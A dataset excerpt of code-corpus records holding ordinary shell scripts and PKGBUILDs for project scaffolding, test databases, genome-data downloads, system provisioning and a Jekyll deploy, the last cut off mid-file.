blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
5846be66cad59f7be841d27ddf7188d8b72bc9e2
|
Shell
|
hmontero1205/pygrader
|
/gen_assignment.sh
|
UTF-8
| 601
| 4.09375
| 4
|
[] |
permissive
|
#!/bin/bash
# Scaffold a new pygrader assignment directory from the *.in templates.
# Usage: gen_assignment.sh <assignment name> [org/repo to clone on setup]
if [ "$#" -lt 1 ]; then
echo "Usage: $0 <assignment name> [org/repo to clone on setup]" >&2
exit 1
fi
# work relative to the script's own directory, where the templates live
cd "$(dirname "$0")"
# assignment directory name is the lowercased first argument
ASS="$(echo "$1" | tr '[:upper:]' '[:lower:]')"
if [ -d "$ASS" ]; then
read -p "Overwrite '$ASS'? [y/N]: " RESP
if [ "$RESP" == y ] || [ "$RESP" == Y ]; then
rm -rf "$ASS"
else
exit 1
fi
fi
mkdir "$ASS" || exit
# instantiate templates; substitute the assignment name into the grader
cp rubric.json.in "$ASS/rubric.json"
cp grader.py.in "$ASS/grader.py"
sed -i "s/ASSIGNMENT/$ASS/g" "$ASS/grader.py"
# with a repo argument, start from the clone template; 'touch' then ensures
# the setup stub exists (and is a no-op when the template was copied)
test "$#" -gt 1 && cp clone_setup.in "$ASS/setup"
touch "$ASS/setup"
chmod +x "$ASS/setup"
# NOTE(review): this sed also runs when $2 is unset, which simply deletes
# the REPO placeholder from the setup script — presumably intended; confirm.
sed -i "s~REPO~$2~g" "$ASS/setup"
| true
|
204a3e8c4234ba53d0156e22b49a27992e395802
|
Shell
|
fragsalat/stups2go
|
/agent/tools/run-with-postgres
|
UTF-8
| 1,808
| 4.34375
| 4
|
[
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] |
permissive
|
#!/bin/sh
# Run a command in a Docker container with a throw-away PostgreSQL server
# linked in:
#   run-with-postgres <postgres-version> <dbname> <docker-image> [<docker-opts>] -- <command>
# The DB_* connection settings are passed into the command's container as
# environment variables; the postgres container is removed afterwards.
TOOLS_DIR=$(dirname $0)
if [ $# -lt 5 ]; then
echo "Usage: $0 <postgres-version> <dbname> <docker-image> [<docker-opts>] -- <command>" >&2
exit 1
fi
DOCKER_IMAGE=$3
DB_VERSION=$1
DB_NAME=$2
# the container name doubles as the database hostname via --link
DB_HOST=test-postgres
DB_PORT=5432
DB_SUBNAME="//$DB_HOST:$DB_PORT/$DB_NAME"
DB_USER=postgres
DB_PASSWORD=postgres
# clean-up old Docker container
docker rm -fv $DB_HOST
# start postgres
echo "INFO: Starting PostgreSQL database..."
docker run -d --name $DB_HOST -e POSTGRES_PASSWORD=$DB_PASSWORD postgres:$DB_VERSION
[ $? -ne 0 ] && exit 1
# wait until db was bootstrapped
# Poll by attempting CREATE DATABASE from a second, linked container; success
# means the server is accepting connections (and creates the test DB as a
# side effect of the probe).
COUNTER=0
while [ true ]; do
docker run --rm --link $DB_HOST -e PGPASSWORD=$DB_PASSWORD --entrypoint psql postgres:$DB_VERSION -h $DB_HOST -p $DB_PORT -U $DB_USER -c "CREATE DATABASE \"${DB_NAME}\";"
[ $? -eq 0 ] && break
# give up after >60 (counter advances 5 per attempt, i.e. ~1 minute of sleeps)
if [ $COUNTER -gt 60 ]; then
echo "ERROR: Not waiting any longer for PostgreSQL database to come up!"
docker rm -f -v $DB_HOST
[ $? -ne 0 ] && echo "ERROR: Could not cleanly shut down PostgreSQL server!"
exit 1
fi
echo "INFO: Waiting for database to come up..."
sleep 5
COUNTER=$(($COUNTER + 5))
done
# remove first 3 args, we saved them leaving us with docker opts and command for the run tool
shift 3
# container link and setup
DOCKER_OPTS="--link $DB_HOST -e DB_SUBNAME=$DB_SUBNAME -e DB_NAME=$DB_NAME -e DB_HOST=$DB_HOST -e DB_PORT=$DB_PORT -e DB_USER=$DB_USER -e DB_PASSWORD=$DB_PASSWORD"
# execute real command
echo "INFO: Database ready, running actual command..."
$TOOLS_DIR/run $DOCKER_IMAGE $DOCKER_OPTS $*
# save the command's exit code so teardown below does not clobber it
status=$?
# shutdown postgres
echo "INFO: Shutting down database..."
docker rm -f -v $DB_HOST
[ $? -ne 0 ] && echo "ERROR: Could not cleanly shut down PostgreSQL server!"
# give correct feedback
exit $status
| true
|
16cfdac9a303b37ac2a0915e179916a3c52f107c
|
Shell
|
yswallow/wbsv-cli
|
/upversion.sh
|
UTF-8
| 851
| 3.359375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Interactive release helper: bump the version string in the project files,
# rebuild sdist/wheel, then optionally git-add/commit, upload to PyPI and push.
#
# BUG FIX: the original tested every answer with [[ "${f}" -eq 'y' ]].
# Inside [[ ]], -eq is an *arithmetic* comparison: a non-numeric answer (and
# the literal 'y') both evaluate to 0, so 0 -eq 0 was true and EVERY prompt
# acted as "yes" regardless of the reply. String equality (==) is correct.
echo "?=>(y|RETURN KEY)"
echo -n "plz version: "
read -r v
echo "new version: ${v}"
echo -n "update files ok?:"
read -r f
if [[ "${f}" == 'y' ]]; then
  for i in README.md setup.py wbsv/*py; do
    # replace any x.y.z version string with the new version
    sed -i -r "s_[0-9]+\.[0-9]+\.[0-9]+_${v}_g" "${i}"
  done
fi
echo -n "rm build dist wbsv.egg-info ok?:"
read -r f
if [[ "${f}" == 'y' ]]; then
  sudo rm -rf build dist wbsv.egg-info
  python3 setup.py sdist bdist_wheel
fi
echo -n "git add ok?:"
read -r f
if [[ "${f}" == 'y' ]]; then
  git add .
fi
echo -n "git commit ok?:"
read -r f
if [[ "${f}" == 'y' ]]; then
  echo -n "plz message(${v}): "
  read -r m
  git commit -m "${m}"
fi
echo -n "deploy pypi ok?(${v}):"
read -r f
if [[ "${f}" == 'y' ]]; then
  python3 -m twine upload --repository pypi dist/*
fi
echo -n "push github ok?:"
read -r f
if [[ "${f}" == 'y' ]]; then
  git push
fi
| true
|
966ce74a5e3c8168d23f256a19d5c5892917352f
|
Shell
|
oloomi/prom
|
/evaluation/get-data.sh
|
UTF-8
| 2,611
| 2.859375
| 3
|
[] |
no_license
|
#!/bin/bash
# Download reference genomes and sequencing reads, find genomic repeats, and
# lay out the directory tree used by the read-mapping evaluation.
# create the standard sub-directories for one experiment ($1 = experiment dir)
make_exp_dir() {
mkdir -p $1/genome-mutated $1/mappings/bowtie $1/mappings/bwa $1/reads $1/results $1/variants
}
# create the per-organism tree and cd into it ($1 = organism dir name)
create_dir() {
mkdir $1
cd $1
mkdir -p genome-ref/repeats simulated-data/begin-supermax simulated-data/middle-supermax real-data/back-mutate
make_exp_dir simulated-data/begin-supermax
make_exp_dir simulated-data/middle-supermax
make_exp_dir real-data/back-mutate
}
# download and unpack a gzipped reference genome ($1 = URL)
get_genome() {
wget -O - $1 | gunzip -c > ./genome-ref/ref-genome.fna
}
# index the reference with mkvtree, then list supermaximal, all, and tandem
# repeats of minimum length $1 with vmatch
find_repeats() {
cd ./genome-ref/repeats
mkvtree -db ../ref-genome.fna -dna -v -allout -pl
vmatch -supermax -l $1 -h 1 ref-genome.fna > supermax-repeats.txt
vmatch -l $1 -d -p ref-genome.fna > all-repeats.txt
vmatch -tandem -l $1 ref-genome.fna > tandem-repeats.txt
cd ../..
}
# run_id read_len dir
# fetch reads from SRA with fastq-dump and trim them to read_len bases
get_reads() {
fastq-dump --outdir $3/reads/fastq --gzip --skip-technical --readids --read-filter pass --dumpbase --split-files --clip $1
gunzip $3/reads/fastq/$1_pass_1.fastq.gz
fastx_trimmer -l $2 -m $2 -Q33 -i $3/reads/fastq/$1_pass_1.fastq -o $3/reads/reads.fq
}
# run_id read_len dir url
# like get_reads, but downloads the fastq directly from ENA ($4 = URL)
get_reads_ena() {
wget $4 -P $3/reads/fastq
gunzip $3/reads/fastq/$1_1.fastq.gz
fastx_trimmer -l $2 -m $2 -Q33 -i $3/reads/fastq/$1_1.fastq -o $3/reads/reads.fq
}
# name min_repeat_len url: build the tree, fetch the genome, find repeats
prepare_data() {
create_dir $1
get_genome $3
find_repeats $2
cd ..
}
# Mycobacterium Tuberculosis H37rv
prepare_data mtb 150 ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCF/000/195/955/GCF_000195955.2_ASM19595v2/GCF_000195955.2_ASM19595v2_genomic.fna.gz
get_reads SRR2818101 150 mtb/real-data/back-mutate
# Escherichia coli
prepare_data ecoli 100 ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCF/000/005/845/GCF_000005845.2_ASM584v2/GCF_000005845.2_ASM584v2_genomic.fna.gz
#get_reads ERR022075 100 yeast/real-data/back-mutate
get_reads_ena ERR022075 100 ecoli/real-data/back-mutate ftp://ftp.sra.ebi.ac.uk/vol1/fastq/ERR022/ERR022075/ERR022075_1.fastq.gz
# NOTE(review): the two 'yeast/...' paths below sit in the E. coli section and
# run BEFORE 'prepare_data yeast' has created that directory — they look like
# they should read 'ecoli/...' (downsampling the reads just fetched); confirm.
mv yeast/real-data/back-mutate/reads.fq yeast/real-data/back-mutate/all-reads.fq
seqtk sample -s100 yeast/real-data/back-mutate/all-reads.fq 2500000 > yeast/real-data/back-mutate/reads.fq
# Saccharomyces cerevisiae S288C (baker's yeast)
prepare_data yeast 150 ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCF/000/146/045/GCF_000146045.2_R64/GCF_000146045.2_R64_genomic.fna.gz
#get_reads ERR1938683 150 yeast/real-data/back-mutate
get_reads_ena ERR1938683 150 yeast/real-data/back-mutate ftp://ftp.sra.ebi.ac.uk/vol1/fastq/ERR193/003/ERR1938683/ERR1938683_1.fastq.gz
# Human chromosome 19 GRCh38.p7 assembly
#prepare_data human-chr19 100 http://hgdownload.cse.ucsc.edu/goldenPath/hg38/chromosomes/chr19.fa.gz
| true
|
be14374d5c73cac8cfde17a3868125687ce578ba
|
Shell
|
115606666/install-imx
|
/imxy18.sh
|
UTF-8
| 1,235
| 3.09375
| 3
|
[] |
no_license
|
#!/bin/sh
# Provision an i.MX Yocto build host on Ubuntu 18: install build
# dependencies, set locale/timezone to Asia/Taipei, install the 'repo' tool
# and configure git with the given identity.
# Usage: imxy18.sh <email> <name>
if [ "$#" -ne 2 ]; then
echo "$0 email name"
exit
fi
# log the script name and both arguments for the provisioning record
echo 0=$0
echo 1=$1
echo 2=$2
sudo apt-get update && \
sudo apt-get -y dist-upgrade && \
sudo apt-get -y install gawk wget git-core diffstat unzip texinfo \
gcc-multilib build-essential chrpath socat libsdl1.2-dev \
libsdl1.2-dev xterm sed cvs subversion coreutils texi2html \
docbook-utils python-pysqlite2 help2man make gcc g++ \
desktop-file-utils libgl1-mesa-dev libglu1-mesa-dev \
mercurial autoconf automake groff curl lzop asciidoc \
u-boot-tools libncurses5-dev lib32ncursesw5-dev \
bc pv vim openssh-server tmux && \
sudo cp /usr/share/zoneinfo/Asia/Taipei /etc/localtime && \
echo 'LANG="en_US.UTF-8"' | sudo dd of=/etc/default/locale && \
echo 'Asia/Taipei' | sudo dd of=/etc/timezone && \
sudo locale-gen en_US.UTF-8 && \
sudo dpkg-reconfigure -f non-interactive tzdata
sudo wget https://commondatastorage.googleapis.com/git-repo-downloads/repo -O /usr/local/bin/repo
sudo chmod 755 /usr/local/bin/repo
sudo gpasswd -a mike sudo
# Quote the arguments: the user name in $2 usually contains a space and,
# unquoted, was split into multiple git-config arguments.
git config --global user.email "$1"
git config --global user.name "$2"
git config --global color.ui auto
git config -l
echo export LC_ALL="en_US.UTF-8" >> ~/.bashrc
| true
|
3f40dc0578f3ef9a80e1a60420611a4aad92673f
|
Shell
|
viniciustbitencourt/rundeck
|
/maintenance/checklogstash.sh
|
UTF-8
| 216
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
# Health check for the logstash systemd unit: print OK and exit 0 when it
# is active, otherwise report it as unavailable and exit 1.
# 'systemctl is-active' prints the unit's activation state ("active",
# "inactive", "failed", ...) directly — far more robust than the original
# scraping of line 3 of 'systemctl status' output, whose layout is not
# stable across systemd versions or locales.
status=$(systemctl is-active logstash.service)
# quote $status: unquoted, an empty result made '[' fail with a syntax error
if [ "$status" == "active" ]; then
  echo "OK"
  exit 0
else
  echo "Logstash indisponivel"
  exit 1
fi
| true
|
82c3a814245a940946779b809203c1c494da646e
|
Shell
|
agimus/agimus-demos
|
/ur10/docker/set_env_for_ur10
|
UTF-8
| 342
| 2.546875
| 3
|
[
"BSD-2-Clause"
] |
permissive
|
#!/bin/bash
# Environment setup for driving the UR10 robot from this docker container:
# derive the robot and ROS master addresses from the HPP host address.
export HPP_HOST=192.168.56.1
export ROS_IP=$HPP_HOST
# The robot sits on the same subnet as HPP_HOST at host address .1: replace
# the trailing octet with "1". ($() replaces the deprecated backticks.)
export UR10_IP=$(echo "$HPP_HOST" | sed 's/[0-9]\+$/1/')
export ROS_MASTER_URI="http://$UR10_IP:11311"
#Solve the error on Gazebo: "Exception sending a message"
export IGN_IP=127.0.0.1
echo "HPP_HOST=$HPP_HOST"
echo "UR10_IP=$UR10_IP"
echo "ROS_MASTER_URI=$ROS_MASTER_URI"
| true
|
9388105764fb60be93c3fa92a1b0d8b0c747f5b4
|
Shell
|
KaOSx/main
|
/chromaprint/PKGBUILD
|
UTF-8
| 753
| 2.734375
| 3
|
[] |
no_license
|
# PKGBUILD for chromaprint, built from a pinned upstream commit.
pkgname=chromaprint
pkgver=1.5.1
# exact upstream commit the source archive is taken from (see source= below)
_commit=aa67c95b9e486884a6d3ee8b0c91207d8c2b0551
pkgrel=2
pkgdesc='Client-side library that implements a custom algorithm for extracting fingerprints from any audio source'
url='https://github.com/acoustid/chromaprint/'
arch=('x86_64')
license=('LGPL')
depends=('ffmpeg')
makedepends=('cmake')
#source=("https://github.com/acoustid/chromaprint/releases/download/v${pkgver}/${pkgname}-${pkgver}.tar.gz")
source=("https://github.com/acoustid/chromaprint/archive/${_commit}.zip")
md5sums=('ce6968a35f7848618a144d5a40efcb6f')
# out-of-tree cmake build; BUILD_TOOLS additionally builds the fpcalc tool
build() {
cmake -B build -S ${pkgname}-${_commit} \
-DCMAKE_BUILD_TYPE=Release \
-DBUILD_TOOLS=ON \
-DCMAKE_INSTALL_PREFIX=/usr
cmake --build build
}
package() {
DESTDIR=${pkgdir} cmake --install build
}
| true
|
9798d11a719c8fc69dd89fd683c6d06ed3a0a1f4
|
Shell
|
MinaProtocol/mina
|
/scripts/ocamlmerlin
|
UTF-8
| 195
| 2.546875
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
# Forward this invocation (arguments and stdin) to the same-named tool
# running inside the project's docker container.
# Created at http://ellenandpaulsnewstartup.com - we're hiring!
script=$(basename "$0")
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
# "$@" (quoted) preserves each argument as one word; the original unquoted
# ${@} re-split arguments containing spaces. <&0 passes stdin through.
"$DIR/run-in-docker" "$script" "$@" <&0
| true
|
8650af3a03e7aa5469b75df7ddf71992bfb099f4
|
Shell
|
mrirecon/ring
|
/Fig2/run.sh
|
UTF-8
| 3,826
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
# Reproduce Fig. 2: compare RING vs AC-adaptive gradient-delay estimation
# over a range of spoke counts, for double-angle (-G) and single-angle (-H)
# radial trajectories and several gradient-delay settings.
set -e
if [ ! -e $TOOLBOX_PATH/bart ] ; then
	echo "\$TOOLBOX_PATH is not set correctly!" >&2
	exit 1
fi
export PATH=$TOOLBOX_PATH:$PATH
export BART_COMPAT_VERSION="v0.4.00"

# Run one experiment series (factored out of four copy-pasted loops).
#   $1 - trajectory angle flag: -G (double angle) or -H (single angle)
#   $2 - gradient delay Sx:Sy:Sxy, passed to 'bart traj -q'
#   $3 - output prefix; results accumulate in <prefix>_RING.txt and
#        <prefix>_ACadaptive.txt, one line per spoke count
run_series() {
	local ANGLE=$1
	local GD=$2
	local PREFIX=$3
	local RO=128
	local SP
	touch ${PREFIX}_RING.txt
	touch ${PREFIX}_ACadaptive.txt
	for (( SP=3; SP<RO; SP++ )); do
		bart traj -x$RO -y$SP -r $ANGLE -c tnom # nominal
		bart traj -x$RO -y$SP -r $ANGLE -q$GD -c -O tGD # parallel + orthogonal shift
		bart scale 0.5 tGD tGDov # increase FOV
		bart phantom -k -s8 -t tGDov kGD
		# RING method
		echo -e $SP "\t" $(DEBUG_LEVEL=0 bart estdelay -R tnom kGD) >> ${PREFIX}_RING.txt
		# AC-Adaptive method (operates on a single spoke)
		bart extract 1 1 $RO kGD kGD1
		bart extract 1 1 $RO tnom tnom1
		echo -e $SP "\t" $(DEBUG_LEVEL=0 bart estdelay tnom1 kGD1) >> ${PREFIX}_ACadaptive.txt
	done
}

run_series -G 0.3:-0.1:0.2 DA_Sx_Sy_Sxy # Double Angle Sx != Sy != Sxy
run_series -H 0.3:-0.1:0.2 SA_Sx_Sy_Sxy # Single Angle Sx != Sy != Sxy
run_series -G 0.3:-0.1:0 DA_Sx_Sy # Double Angle Sx != Sy, Sxy=0
run_series -H 0.3:-0.1:0 SA_Sx_Sy # Single Angle Sx != Sy, Sxy=0
run_series -G 0.3:0.3:0 DA_Sx # Double Angle Sx == Sy, Sxy=0
run_series -H 0.3:0.3:0 SA_Sx # Single Angle Sx == Sy, Sxy=0
# remove intermediate BART data files
rm k*cfl k*hdr t*cfl t*hdr
| true
|
4c27a54487de7de2eef8f389bd62a60533f2ba62
|
Shell
|
yuhuachang/yuhuachang.github.io
|
/scripts/create-database.sh
|
UTF-8
| 245
| 3.203125
| 3
|
[] |
no_license
|
#!/bin/bash
# (Re)create a PostgreSQL database: drop any existing database of that name,
# create it fresh, and list the databases for confirmation.
DB_DATABASE=$1
# -z replaces the original '== ""' comparison; also fixes the usage typo
if [ -z "$DB_DATABASE" ]; then
  echo "usage $0 <database>"
  exit
fi
# drop first; silence the error printed when the database does not exist yet
# NOTE(review): the name is interpolated into a shell command — only safe for
# trusted callers; confirm this script is never fed user input.
sudo su - postgres -c "dropdb $DB_DATABASE" 2>/dev/null
sudo su - postgres -c "createdb $DB_DATABASE"
sudo su - postgres -c "psql --list"
| true
|
fcb6090b0af0411feb7bc6f5b50fd9eaf81443ab
|
Shell
|
jackzampolin/btcd-ops
|
/btcd.sh
|
UTF-8
| 342
| 3.28125
| 3
|
[] |
no_license
|
#!/bin/bash
# Tiny process manager for a local btcd node: start it detached with logs
# and a pidfile, stop it via SIGINT, or follow its stdout log.
DIR="$HOME/.btcd"
case "$1" in
start)
  $HOME/go/bin/btcd 1>> "$DIR/btcd_stdout.log" 2>> "$DIR/btcd_stderr.log" & echo $! > "$DIR/btcd.pid"
  ;;
stop)
  kill -SIGINT $(cat "$DIR/btcd.pid")
  ;;
logs)
  tail -f "$DIR/btcd_stdout.log"
  ;;
*)
  echo "btcd {{ start | stop | logs }}"
  ;;
esac
| true
|
a87e46ebf1af1cb1e3dec35feffb88fdc5bdeaaa
|
Shell
|
boris-chernysh/dotfiles
|
/i3/scripts/screens.sh
|
UTF-8
| 263
| 3.359375
| 3
|
[] |
no_license
|
#!/bin/bash
# Apply an xrandr screen layout chosen by how many displays are connected.
SCREENS_COUNT=$(xrandr | grep ' connected' -c)
DIR=$(dirname "${BASH_SOURCE[0]}")
echo $DIR > /tmp/screenslog
# dispatch on the connected-display count; anything unexpected gets the
# single-screen layout
if [ "$SCREENS_COUNT" = 3 ]; then
  bash "$DIR/screenlayout/3.sh"
elif [ "$SCREENS_COUNT" = 2 ]; then
  bash "$DIR/screenlayout/2.sh"
else
  bash "$DIR/screenlayout/1.sh"
fi
| true
|
33df2388b42c25c940ef6304546659666ad47b08
|
Shell
|
petronny/aur3-mirror
|
/hooktftp-git/PKGBUILD
|
UTF-8
| 868
| 2.78125
| 3
|
[] |
no_license
|
# Maintainer: Josh Cartwright <joshc@eso.teric.us>
# AUR package building hooktftp from the latest upstream git revision.
pkgname=hooktftp-git
pkgver=0.10.0.r28.g8bba8e8
pkgrel=1
pkgdesc="Hook based tftp server"
arch=('x86_64' 'i686')
url="https://github.com/epeli/hooktftp"
license=('MIT')
makedepends=('go' 'bzr')
source=('git://github.com/epeli/hooktftp.git')
md5sums=('SKIP')
# version from git: <last tag>.r<commits since tag>.g<short hash>
pkgver() {
cd "$srcdir"/hooktftp
git describe --long --tags | sed 's/\([^-]*-g\)/r\1/;s/-/./g'
}
prepare() {
# Quick hack to put the makepkg-checked-out clone into GOPATH
mkdir -p "$srcdir"/src/github.com/epeli
ln -sf "../../../hooktftp" "$srcdir"/src/github.com/epeli/hooktftp
# fetch the goyaml dependency (bzr-hosted on launchpad) into the same GOPATH
GOPATH="$srcdir" go get -v -x launchpad.net/goyaml
}
build() {
GOPATH="$srcdir" go get github.com/epeli/hooktftp
}
package() {
install -Dm755 "$srcdir/bin/hooktftp" "$pkgdir/usr/bin/hooktftp"
install -Dm644 "$srcdir/hooktftp/LICENSE" \
"$pkgdir/usr/share/licenses/hooktftp/LICENSE"
}
| true
|
892d9839d0e7ca1b459f6a6c511bda5258ee5187
|
Shell
|
poojagaikwad1358/Day14_UserRegistration
|
/userRegistration.sh
|
UTF-8
| 2,083
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/bash -x
# Day-14 user registration exercise: prompt for each field and check it
# against the corresponding regular expression, printing whether it matches.
# The eight copy-pasted if/else blocks are factored into one helper.

# validate <value> <pattern> <valid_msg> <invalid_msg>
# Prints <valid_msg> when <value> matches the extended regex <pattern>,
# otherwise prints <invalid_msg>.
validate() {
	if [[ $1 =~ $2 ]]
	then
		echo "$3"
	else
		echo "$4"
	fi
}

#Use Case 1- As a User need to enter a valid First Name.
echo "Welcome to User Registration"
echo "Enter User First Name :"
read -r firstName
# capital letter followed by at least three lower-case letters
validate "$firstName" "^[A-Z][a-z]{3,}$" "Valid" "Invalid"
#UseCase2- As a User need to enter a valid last Name.
echo "Enter User last Name : "
read -r lastName
validate "$lastName" "^[A-Z][a-z]{3,}$" "Valid" "Invalid"
#UseCase3 - As a user need to enter valid email.
echo "Enter the User EmailId: "
read -r emailId
# same email pattern as the original (bracket expressions include spaces)
validate "$emailId" "^[a-z A-Z 0-9 . - _ +]*[@][a-z 0-9]*[.][a-z ,]*[.][a-z ,]*$" "valid EmailId" "Invalid EmailId"
#UseCase4 - As a User need to follow pre-defined Mobile Format
echo "Enter Mobile number: "
read -r mobNo
# 2-digit country code, a space, then 10 digits not starting with 0
validate "$mobNo" "^[0-9]{2}[ ][1-9]{1}[0-9]{9}" "Valid number." "Invalid number."
#UseCase5- As a user need to follow pre-defined Password rules.
#Rule1- Minimum 8 character
read -r -p "Enter Password: " password
validate "$password" "[a-z]{8,}" "Valid password." "Invalid password."
#UseCase6- Rule2- Should have atleast 1 Upper Case
read -r -p "Enter Password: " password2
validate "$password2" "[a-zA-Z]{8,}" "Valid password." "Invalid password."
#UseCase7- Rule3- Should have atleast 1 numeric number in the password
read -r -p "Enter Password: " password3
validate "$password3" "^[a-zA-Z0-9]{8,}" "Valid password." "Invalid password."
#UseCase8- Rule4- Has exactly 1 Special character
echo "Enter the User Password:"
read -r password4
validate "$password4" "[a-z A-Z 0-9 \!\@\#\$\%\^\&\* ? = . ]{8}$" "Valid Password" "Invalid Password"
| true
|
0f1b1ab119fc76b02926518a4c7a3235a13aa967
|
Shell
|
wrtcoder/BPI-files
|
/others/bpi-service/var/lib/bananapi/bpi-init.d/S03-bpi-sw-gpu.sh
|
UTF-8
| 548
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash
# Select the lightdm X server configuration at boot: the bpi-m3 board gets
# the PowerVR (pvr) xserver-command snippet; every other board gets the
# stock X server with the snippet removed.
BOARD=$(bpi-hw)
XSGXFILE="/usr/share/lightdm/lightdm.conf.d/55-xserver-command-pvr.conf"
XSGXBAK="/usr/share/lightdm/lightdm.conf.d/.55-xserver-command-pvr.conf"
# Install the SGX lightdm snippet from its hidden backup copy, but only if
# the proprietary X binary is present and the snippet is not already there.
setup_xsgx_xserver()
{
	if [ -f "/usr/local/XSGX/bin/X" ] && [ ! -f "$XSGXFILE" ] ; then
		cp -a $XSGXBAK $XSGXFILE
	fi
}
# Remove the SGX snippet so lightdm falls back to the normal X server.
setup_normal_xserver()
{
	if [ -f "$XSGXFILE" ] ; then
		rm -f $XSGXFILE
	fi
}
# Dispatch on the detected board type.
setup_board()
{
	if [ "${BOARD}" = "bpi-m3" ] ; then
		setup_xsgx_xserver
	else
		setup_normal_xserver
	fi
}
#main
setup_board
| true
|
4867918934f0b7c6fb8ae8ac75df6b6d9ea317fb
|
Shell
|
alekye/AYConfiguration
|
/run.sh
|
UTF-8
| 371
| 3.328125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# auto pull the configure file
# Fetch dotfile configuration from the GitHub repo into $HOME.
BASE_URL=https://raw.githubusercontent.com/alekye/AYConfiguration/master
# cache-buster query string so raw.githubusercontent.com never serves a stale file
DISABLE_CACHE="?v=$(date +%s)"
# POSIX function syntax: the 'function' keyword is a bashism and is not
# guaranteed to work under /bin/sh.
echo_green() {
  echo "\033[32m$1\033[0m"
}
# .vimrc
VIMRC_FILE=${BASE_URL}/vimrc${DISABLE_CACHE}
echo "Download .vimrc to ~/.vimrc from ${VIMRC_FILE}"
# quoted: the URL contains '?' which is a glob character when unquoted
curl -o ~/.vimrc "${VIMRC_FILE}"
echo "Download .vimrc 【OK】"
| true
|
79f2106666a8d0e0e1b65c6e0c4862e62b2b5304
|
Shell
|
Zriakhov/petclinic
|
/jenkins_file/VM2_start.sh
|
UTF-8
| 422
| 3.046875
| 3
|
[
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Redeploy the petclinic stack: stop and remove the running compose stack
# (if any), refresh the image from the private registry, bring it back up.
a=$(sudo docker ps | grep petclinic | cut -d' ' -f 1)
echo "ID container="$a
if [ -n "${a}" ]; then
  # fixed message typos ("Conteiner runing" / "Conteiner don't run")
  echo "Container running"
  docker-compose -f docker-compose_petclinic.yml stop
  docker-compose -f docker-compose_petclinic.yml rm -f
else
  echo "Container not running"
fi
# NOTE(review): 'sudo docker' above vs plain 'docker' below — presumably the
# CI user is in the docker group; confirm the sudo is actually needed.
docker rmi 10.23.27.6:443/petclinic -f
docker pull 10.23.27.6:443/petclinic:stable
docker-compose -f docker-compose_petclinic.yml up -d
| true
|
20bb642f4c20a9cdea7bd9e37b78578131447db6
|
Shell
|
NoahRJohnson/MapReduce-Basic-Statistics
|
/q2_TwoPass.sh
|
UTF-8
| 394
| 2.625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Two-pass MapReduce variance: run the mean job first, then hand its result
# to the variance job as a jobconf parameter.
# The output of TwoPass_Mean.py is 'key mean'
tmp=$(python electricityVariance_TwoPass_Mean.py Example\ Data/Electricity.csv)
# extract the mean: awk splits on any whitespace, so this works whether the
# key/mean separator is a tab or spaces (the original relied on unquoted
# 'echo $tmp' collapsing whitespace before 'cut -d'"'"' '"'"' could split it)
mean=$(printf '%s\n' "$tmp" | awk '{print $2}')
# Pass the mean as a parameter to the reducers in TwoPass_Variance.py
# (the original wrapped it in a useless $(echo ...))
python electricityVariance_TwoPass_Variance.py Example\ Data/Electricity.csv --jobconf my.job.settings.mean="$mean"
| true
|
3163d71584aecac9558780649482f8eebc49cdf1
|
Shell
|
azimut/dotfiles
|
/homedir/bin/piano.sh
|
UTF-8
| 715
| 2.921875
| 3
|
[] |
no_license
|
#!/bin/bash
# Start (or attach to) a tmux session wired for playing a MIDI keyboard:
# one pane runs midihack, one runs fluidsynth with a GM soundfont, and the
# ALSA sequencer ports are chained keyboard -> midihack -> fluidsynth.
SESSION='piano'
SF='/usr/local/share/samples/sf_GMbank.sf2'
OPTS=()
# OPTS=(-R yes)
# bail out unless the USB-MIDI cable (CH345, ALSA seq client 20) is present
if ! aconnect -i | grep "client 20: 'CH345'"; then
echo "Midi cable not connected?"
exit 1
fi
# reuse an existing session: attach when outside tmux, switch when inside
if tmux has -t "${SESSION}"; then
echo "attaching session...${SESSION}"
if [[ -z $TMUX ]]; then
tmux attach -t "${SESSION}"
else
tmux switch-client -t "${SESSION}"
fi
exit 0
fi
# fresh session: left pane for the user, right panes for midihack + synth
tmux new -d -s "${SESSION}" \; \
switch-client -t "${SESSION}" \; \
split-window -h midihack \; \
split-window -v fluidsynth "${OPTS[@]}" --gain 1 -a alsa "${SF}" \; \
select-pane -L
aconnect 20:0 130:0 # piano -> midihack
sleep 2 # wait for fluidsynth to be ready
aconnect 130:1 131:0 # midihack -> fluidsynth
| true
|
7b3477161b42ad2f7d562b3289ac27e02a5a4512
|
Shell
|
pigfly/pigfly.github.io
|
/script/cibuild.sh
|
UTF-8
| 592
| 3.53125
| 4
|
[
"Apache-2.0",
"CC-BY-4.0"
] |
permissive
|
#!/bin/bash
# Travis CI deploy: rebuild the Jekyll site and force-push the result to the
# gh-pages branch. Requires GH_TOKEN (GitHub push token) in the environment.
# skip if build is triggered by pull request
# ($TRAVIS_PULL_REQUEST is quoted: unquoted and unset, '[' aborted with a
# "unary operator expected" syntax error instead of taking the false branch)
if [ "$TRAVIS_PULL_REQUEST" == "true" ]; then
  echo "this is PR, exiting"
  exit 0
fi
# enable error reporting to the console
set -e
# cleanup "_site"
rm -rf _site
mkdir _site
# clone remote repo to "_site"
git clone https://${GH_TOKEN}@github.com/pigfly/pigfly.github.io.git --branch gh-pages _site
# build with Jekyll into "_site"
bundle exec jekyll build
# push
cd _site
git config user.email "pigflyjky@gmail.com"
